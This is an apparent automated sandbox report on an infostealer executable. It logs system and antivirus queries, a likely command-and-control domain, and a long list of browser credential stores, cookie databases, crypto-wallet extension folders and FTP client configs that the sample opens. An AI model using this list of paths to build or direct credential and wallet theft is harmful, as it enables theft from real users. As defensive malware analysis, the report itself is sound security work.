                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00438040 cpuid 3_2_00438040
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,0_2_006D6065
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,0_2_006DA8F8
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_006DA9A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,0_2_006DABF3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,0_2_006DAC60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,0_2_006D656D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,0_2_006DAD35
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,0_2_006DAD80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006DAE27
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_006DA6A7
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,0_2_006DAF2D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,3_2_006D6065
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,3_2_006DA8F8
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_006DA9A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,3_2_006DABF3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,3_2_006DAC60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,3_2_006D656D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: EnumSystemLocalesW,3_2_006DAD35
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,3_2_006DAD80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_006DAE27
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_006DA6A7
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: GetLocaleInfoW,3_2_006DAF2D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006CA395 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006CA395
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z"
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
